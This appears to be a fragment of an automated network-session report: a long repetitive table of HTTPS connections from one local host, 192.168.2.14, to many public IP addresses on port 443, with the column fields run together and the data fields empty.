                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20188192.168.2.1442074120.75.20.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20189192.168.2.144256268.22.153.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20190192.168.2.1433616133.2.26.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20191192.168.2.1435836159.67.169.247443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20192192.168.2.144414642.227.61.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20193192.168.2.1452630163.72.115.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20194192.168.2.145525089.252.105.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20195192.168.2.1451796199.30.252.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20196192.168.2.144385894.212.106.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20197192.168.2.1436866104.203.105.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20198192.168.2.144055881.160.169.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20199192.168.2.1432824166.119.195.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20200192.168.2.1458088213.59.90.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20201192.168.2.144991653.204.203.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20202192.168.2.1440506170.22.35.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20203192.168.2.143476813.225.108.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20204192.168.2.144171660.30.57.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20205192.168.2.1446388107.5.160.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20206192.168.2.1457228212.76.248.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20207192.168.2.1440444188.202.64.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20208192.168.2.1440012182.169.165.203443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20209192.168.2.1441358219.208.227.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20210192.168.2.144052087.23.92.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20211192.168.2.145159275.170.56.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20212192.168.2.144940017.61.125.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20213192.168.2.1440818158.152.79.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20214192.168.2.1446052164.30.103.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20215192.168.2.1457736185.114.145.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20216192.168.2.145090874.237.191.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20217192.168.2.145011675.62.218.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20218192.168.2.144700291.217.118.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20219192.168.2.1446418104.105.248.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20220192.168.2.1449642180.221.193.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20221192.168.2.143358459.187.216.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20222192.168.2.1460028158.55.85.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20223192.168.2.1434256209.112.239.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20224192.168.2.1435202114.132.50.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20225192.168.2.14515302.43.196.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20226192.168.2.144794024.12.169.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20227192.168.2.1453842199.61.173.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20228192.168.2.143465252.251.110.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20229192.168.2.1447136169.77.15.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20230192.168.2.1443162206.90.66.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20231192.168.2.1445550194.240.127.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20232192.168.2.143430061.80.53.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20233192.168.2.1444758136.75.141.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20234192.168.2.1447676206.156.91.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20235192.168.2.144089831.50.13.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20236192.168.2.144173844.79.86.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20237192.168.2.145582036.42.181.95443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20238192.168.2.143280863.34.30.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20239192.168.2.1439276188.148.249.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20240192.168.2.1440916200.222.74.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20241192.168.2.1450526152.254.71.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20242192.168.2.1444480122.21.118.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20243192.168.2.1458648101.187.180.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20244192.168.2.1448034202.160.20.62443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20245192.168.2.143829484.155.32.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20246192.168.2.144746697.46.6.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20247192.168.2.144467634.120.203.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20248192.168.2.1442952142.173.49.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20249192.168.2.1448764186.242.247.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20250192.168.2.1453952156.25.158.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20251192.168.2.145791025.204.182.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20252192.168.2.144562620.157.109.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20253192.168.2.1459126148.52.87.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20254192.168.2.145207486.8.139.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20255192.168.2.1444096138.48.94.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20256192.168.2.1442256167.122.189.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20257192.168.2.1442854125.31.209.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20258192.168.2.145298812.113.200.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20259192.168.2.1449728133.224.36.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20260192.168.2.144831694.120.65.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20261192.168.2.1452220174.85.226.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20262192.168.2.145065295.80.253.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20263192.168.2.1449876182.152.84.210443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20264192.168.2.1444832148.119.37.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20265192.168.2.1451510171.44.11.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20266192.168.2.145643254.58.181.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20267192.168.2.1436286217.168.254.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20268192.168.2.1458738134.208.82.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20269192.168.2.1441394190.110.16.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20270192.168.2.146090446.239.119.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20271192.168.2.144691038.169.70.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20272192.168.2.145220673.24.223.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20273192.168.2.1438342211.58.163.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20274192.168.2.143440225.173.30.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20275192.168.2.1446844131.38.216.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20276192.168.2.145261649.160.252.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20277192.168.2.1438406192.1.198.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20278192.168.2.1433784132.160.255.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20279192.168.2.144598891.194.239.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20280192.168.2.145706678.7.142.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20281192.168.2.1435514167.212.151.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20282192.168.2.143372654.187.138.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20283192.168.2.1457566195.239.216.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20284192.168.2.145629275.173.226.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20285192.168.2.145083237.33.238.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20286192.168.2.1460250191.165.146.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20287192.168.2.1435362175.18.88.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20288192.168.2.1454082100.40.200.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20289192.168.2.1456576138.26.4.99443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20290192.168.2.1437150137.236.31.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20291192.168.2.1459760141.32.147.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20292192.168.2.143280239.26.85.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20293192.168.2.144990278.44.4.163443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20294192.168.2.144160095.16.7.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20295192.168.2.145144695.41.81.163443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20296192.168.2.144189235.167.109.161443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20297192.168.2.1452110198.215.100.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20298192.168.2.1446386110.34.151.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20299192.168.2.1443982145.30.209.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20300192.168.2.1446938183.182.105.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20301192.168.2.14420742.151.58.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20302192.168.2.1446686208.84.225.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20303192.168.2.1438282167.118.141.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20304192.168.2.1455200166.232.159.133443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20305192.168.2.144905677.4.238.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20306192.168.2.1459788183.134.212.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20307192.168.2.143494278.169.212.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20308192.168.2.1437688147.212.219.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20309192.168.2.143877420.253.222.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20310192.168.2.1454594182.167.209.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20311192.168.2.143714877.197.100.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20312192.168.2.14350785.235.143.17443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20313192.168.2.144394819.29.49.210443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20314192.168.2.143850882.80.74.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20315192.168.2.1454774170.94.44.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20316192.168.2.1436658180.64.246.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20317192.168.2.14607722.223.166.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20318192.168.2.1443784169.28.9.95443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20319192.168.2.1447012134.217.43.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20320192.168.2.144851669.168.184.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20321192.168.2.1440466182.210.240.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20322192.168.2.144194495.14.47.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20323192.168.2.1455654203.254.170.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20324192.168.2.145509445.0.201.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20325192.168.2.1437846187.28.163.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20326192.168.2.145189694.5.128.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20327192.168.2.14365945.216.20.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20328192.168.2.1458724217.182.223.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20329192.168.2.1459154137.18.73.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20330192.168.2.145248035.9.188.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20331192.168.2.1441768128.123.1.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20332192.168.2.1449476193.155.53.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20333192.168.2.14524582.151.136.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20334192.168.2.1456616109.38.252.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20335192.168.2.1451820176.142.48.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20336192.168.2.1438088198.10.84.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20337192.168.2.145825282.47.217.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20338192.168.2.144521674.205.114.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20339192.168.2.1433752166.97.78.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20340192.168.2.1445096101.171.96.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20341192.168.2.1442402168.189.54.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20342192.168.2.1438090177.139.237.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20343192.168.2.1458314159.148.102.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20344192.168.2.1450656102.0.25.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20345192.168.2.1455270115.155.249.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20346192.168.2.144863678.79.44.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20347192.168.2.144014266.68.183.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20348192.168.2.1441492112.92.71.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20349192.168.2.145502617.38.103.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20350192.168.2.1436668105.172.91.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20351192.168.2.144549882.200.104.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20352192.168.2.1447186126.13.30.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20353192.168.2.1444182143.237.92.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20354192.168.2.144654867.121.216.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20355192.168.2.1448792141.54.216.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20356192.168.2.1457600109.42.245.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20357192.168.2.145775025.224.158.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20358192.168.2.1443074205.140.13.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20359192.168.2.1458050131.102.249.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20360192.168.2.145888450.8.116.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20361192.168.2.1437688197.215.89.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20362192.168.2.1446436110.128.206.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20363192.168.2.1435414216.243.124.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20364192.168.2.1454498194.22.146.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20365192.168.2.1440910114.21.124.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20366192.168.2.1448176102.59.146.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20367192.168.2.144322483.157.32.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20368192.168.2.145129048.158.190.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20369192.168.2.1459470155.122.75.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20370192.168.2.1445694209.79.152.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20371192.168.2.1455426131.212.204.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20372192.168.2.1451294162.168.168.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20373192.168.2.1459500155.233.121.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20374192.168.2.146085840.113.152.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20375192.168.2.1444872208.145.19.203443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20376192.168.2.1456068159.232.196.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20377192.168.2.1434606149.41.164.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20378192.168.2.1457316102.193.149.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20379192.168.2.1448664132.61.151.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20380192.168.2.145876034.29.177.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20381192.168.2.1437760101.28.103.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20382192.168.2.1451528147.31.184.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20383192.168.2.143929053.158.99.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20384192.168.2.1460832138.151.193.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20385192.168.2.1445782212.72.204.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20386192.168.2.145698617.22.191.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20387192.168.2.144727265.102.247.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20388192.168.2.1457384206.111.93.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20389192.168.2.144386054.81.220.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20390192.168.2.1435890125.91.114.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20391192.168.2.1436374204.207.122.219443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20392192.168.2.1445474106.139.161.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20393192.168.2.144275073.196.70.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20394192.168.2.143720276.111.31.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20395192.168.2.146034039.124.28.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20396192.168.2.143965035.42.79.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20397192.168.2.14346749.56.253.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20398192.168.2.1436626176.38.14.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20399192.168.2.1454378194.156.173.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
